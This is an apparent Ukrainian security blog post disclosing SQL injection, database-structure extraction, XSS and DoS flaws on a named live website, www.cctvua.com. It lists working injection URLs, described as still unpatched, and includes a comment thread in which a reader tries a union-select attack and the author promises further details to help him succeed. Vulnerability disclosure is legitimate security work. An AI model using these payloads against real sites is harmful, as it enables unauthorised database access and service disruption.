Уразливості на www.cctvua.com

19:41 10.03.2009

27.06.2008

У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

10.03.2009

SQL DB Structure Extraction

http://www.cctvua.com/?p=202989;c=1′;s=28

SQL Injection:

http://www.cctvua.com/?p=202989;c=1;s=1%20and%20version()%3E4

http://www.cctvua.com/?p=202989;c=1%20and%20version()%3E4;s=28

http://www.cctvua.com/?p=-1%20union%20select%20version(),1,1/*;c=1;s=28

Дві blind SQL Injection та одна звичайна SQL ін’єкція.

XSS (через SQL Injection):

DoS (через SQL Injection):

http://www.cctvua.com/?p=202989;c=1;s=-1%20or%201=1/*

http://www.cctvua.com/?p=202989%20or%201=1/*;c=1;s=28

Дані уразливості досі не виправлені.


2 відповідей на “Уразливості на www.cctvua.com”

  1. n3m0 каже:

    Я так зрозумів, там запит в запиті?
    http://www.cctvua.com/?p=203255;c=1;s=-21+union+select+1–
    Якщо Ви це мали на увазі

    Я так і не дійшов до мети ;)
    (с) n3m0

  2. MustLive каже:

    n3m0

    Уразливостей на тому сайті чимало (в движку, що вони використовують). В тому числі й декілька SQL Injection. Є як blind SQLi, так і звичайна SQLi, що дозволяє робити запит в запиті. Про що я найближчим часом напишу деталі.

    Я так і не дійшов до мети

    В параметрі s наявна blind SQLi, де не можна використати вкладений запит, тому ти й не дійшов до мети (там потрібен інший підхід). Не переживай, незабаром я оприлюдню деталі і з моїми прикладами ти зможеш дійти до мети :-) .

Leave a Reply

You must be logged in to post a comment.